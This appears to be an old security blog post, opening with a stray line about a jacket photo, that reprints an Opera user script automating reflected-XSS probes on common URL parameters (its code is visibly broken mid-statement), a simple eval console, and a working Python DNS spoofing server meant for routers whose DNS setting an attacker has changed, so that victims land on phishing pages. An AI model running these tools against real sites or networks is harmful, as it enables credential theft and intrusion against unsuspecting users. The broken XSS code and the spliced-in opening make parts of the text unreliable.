Here’s a photo I took after buying my superdry jacket..

http://www.spinhunters.org/blog/black-liquid/

I got this sent in by Sam Aldis, two nice user scripts created for Opera to test the security in websites by automating XSS c.q. SQL injection. This is really useful if you want to test websites actually. Secondly he also has a simple Javascript console, which in term can be quite useful also. I always wanted to write something similar, so nice ideas to expand on. I also thought about the idea to have Opera run on my second PC which will be dedicated in testing websites for instance. This way you can create a Nessus like scanner, integrated in Opera. Why not, it is certainly possible and only limited by your imagination. By the way, did you know that Opera now has a UserScript virtual I/O file-system API in it’s new version? this enables you to read and write to the computer it runs on in a safe manner. It creates an environment of more possibilities in stable way for analyzing websites and storing the results if necessary.

aWaT script:

(function(opera){
/*
	aWaT - Automated Web Attack (A-Wah)
	Created By Sam Aldis
	http://darkstar.me.uk

	thanks to 0x000000.com for the insperation and introducing me to
	opera as well as the layout for the output.
*/

	// The getCookie function can be used to retrieve a specific cookie
	// this cookie must have been set with the setCookie function
	// probably not the easiest way to do it but it works.
	getCookie = function(con){
		var c = document.cookie;
		var cn = con;
		var cnm = 0;
		var s = 0;
		var e = 0;
		var xf = 0;
		for(i=0;i<c.length;i++){
			if(cnm>=cn.length){
				var s = i;
			}
			if(c[i]==cn[cnm]){
				cnm++;
			}
			else{
				cnm = 0;
			}
			if(s != 0 && e == 0){
				if(c[i] == ":"){
					e = i;
				}
			}
		}
		var text = c.substr(s+1,e-s-1);
		return(text);
	}
	// sets a cookie using ":" as the delimiter
	// as singular cookies won't have ; at the end.
	setCookie = function(cname,data){
		void(document.cookie = cname + "=" + data + ":");
	}
	// set the get vars that maybe vulnerable
	var vars = ['q','query','search','page','username','user','id','tag','record','listing','name','type','text','msg','message'];
	// sets other variables
	var crlf = ". \r\n";
	var xss_msg = "";
	// main body of the code
	if(getCookie("awat")!="2"){
		window.addEventListener('load', function(e) {
			if(document.location.href.indexOf("&endt=1")!=-1){
					setCookie("awat","2");
			}
			else{
				if(getCookie("awat") != 1){
					if(document.body.innerHTML.indexOf("<script>void(192)</script>")== -1){
						for(k=0;k<vars.length + 1;k++){
							if(document.location.href.indexOf("&" + vars[k] + "=") > 0 || document.location.href.indexOf("?" + vars[k] + "=") > 0){
								if(getCookie("awat")==""||getCookie("awat")=="0"){
									var cloc = document.location.href;
									xss_msg += "Possible XSS in variable " + vars[k] + crlf;
									var nloc = cloc + "&" + vars[k] + "=" + "<script>void(192)</script>";
									setCookie(
									document.location = nloc + "&01536362";
								}
							}
						}
					}
					else{
						xss_msg += "XSS found at location: " + document.location.href + crlf;
						xf = 1;
					}
				}
				else{
					if(document.body.innerHTML.indexOf("<script>void(192)</script>") == -1){
						xss_msg += "No XSS found in page" + crlf;
						xf = 1;
					}
				}
				if (xss_msg != '' && xss_msg != undefined ) {
					if(xf = 1){
						// displays the output text, style taken from arioso created
						// by 0x000000.com.
						var p = document.createElement('a');
						p.style.position = 'fixed';
				                p.style.top = '0px';
				                p.style.left  = '0px';
				                p.style.width = '100%';
						p.style.opacity = '.90';
						p.style.filter = 'alpha(opacity=90)';
				                p.style.border = '1px dotted #f30';
				                p.style.padding = '3px';
				                p.style.font = '8pt sans-serif';
				                p.style.backgroundColor  = '#f00';
				                p.style.color = '#fff';
						p.href = document.location + "&endt=1";
						p.appendChild(document.createTextNode('aWa message: ' + xss_msg + " Click to stop testing on this domain"));
						document.body.appendChild(p);
						if(document.location.href.indexOf("&01536362") == -1){
							setCookie("awat","0");
						}
						else{
							setCookie("awat","1");
						}
					}
			    }
			}
		}, false);
	}
})(window.opera);

Javascript console script:

/*
	Javascript Console@http://www.google.co.uk/js
	created by Sam Aldis

	A very simple way to execute javascript in your browser.
*/
(function(opera){
	window.addEventListener('load',function(e) {
		if(document.location.href == "http://www.google.co.uk/js"){
			document.title = "JS Console";
			document.body.innerHTML = "<style>body{ background-color: black; color: red;}textarea{background-color:black; color: red;}input{background-color: black; color: red;}</style><div align='center'><img src='http://www.google.co.uk/intl/en_uk/images/logo.gif'><br /><textarea id='js' name='js' cols='60' rows='20'>javascript</textarea><br /><input type='button' value='Eval' onclick='eval(document.getElementById(\"js\").value)'></div>";
		}},false);
})(window.opera);

I have recently been doing research into WiFi connections without wepkeys and where the attacker is able to change the primary DNS server on the router. This is actually a very serious problem as the attacker is able to get your credit card details or any other information you input without you even knowing.

Imagine you are at a hotel with your laptop. You connect to the WiFi that they provide and type in www.google.com, which brings up google’s front page. The address bar says http://www.google.com and the page looks genuine so it is.. isn’t it? However, attackers may could have got access to the router and changed the primary DNS server through many of the available methods in the wild, like UPnP hacking, etc.

Theoretically, the attacker could use any IP address to pull the trick, as long as a DNS server was running behind the UDP port 53. But it would be more beneficial if the attacker is under control of this DNS server, so he/she is able to show the user what ever they want them to see. For example, the user could type in their bank’s website address and end up at a phishing page but they wouldn’t know because they would see their banks address in the title bar and the page could be made to look exactly the same (and auto-update itself through some PHP magic). When the user logs in, a fake DNS server will respond which will make the user go to the wrong IP address. As you can see this is a big threat that will affect anyone who hasn’t secured their network.

I have created a python script which can act as a temporary DNS server which will direct all requests to a certain IP (keep checking http://darkstar.me.uk for updates). Here is the script that complies to the scenarios described above:

# DNS Injection Server
# Created By fazed
# DNSQuery class adapted from Francisco Santos's
# code. why re-invent the wheel?

from socket import *

class DNSQuery:
 def __init__(self, data):
   self.data=data
   self.domain=''

   tipo = (ord(data[2]) >> 3) & 15
   if tipo == 0:
     ini=12
     lon=ord(data[ini])
     while lon != 0:
       self.domain+=data[ini+1:ini+lon+1]+'.'
       ini+=lon+1
       lon=ord(data[ini])

 def respond(self, ip):
   packet=''
   if self.domain:
     packet+=self.data[:2] + "\x81\x80"
     packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
     packet+=self.data[12:]
     packet+='\xc0\x0c'
     packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
     packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.')))
   return packet

print ":: DNS Injection Server Started ::"
sh = socket(AF_INET, SOCK_DGRAM)
print "Socket Handle Created.."
sh.bind(('',53))
print "Socket Handle Bound To UDP Port 53"
ip = raw_input("IP to inject: ")
try:
   while 1:
       data, addr = sh.recvfrom(1024)
       print "DNS Request From:", addr[0]
       p = DNSQuery(data)
       print "Sending IP address:", ip
       sh.sendto(p.respond(ip),addr)
       print "Response Sent.."
except KeyboardInterrupt:
   print ":: DNS Injection Server Stoped ::"
   sh.close()

The bottom line is: secure your networks and don’t trust public WiFi access points.